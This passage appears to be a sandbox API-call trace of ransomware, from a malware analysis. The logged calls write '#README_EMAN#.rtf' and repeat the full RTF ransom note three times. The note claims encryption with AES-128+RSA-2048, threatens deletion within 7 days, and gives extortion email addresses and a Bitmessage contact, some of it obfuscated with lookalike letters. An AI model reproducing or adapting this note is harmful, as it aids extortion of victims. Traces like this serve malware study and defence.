Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf")) returned 0xffffffff [0268.808] GetLastError () returned 0x2 [0268.808] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2466938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 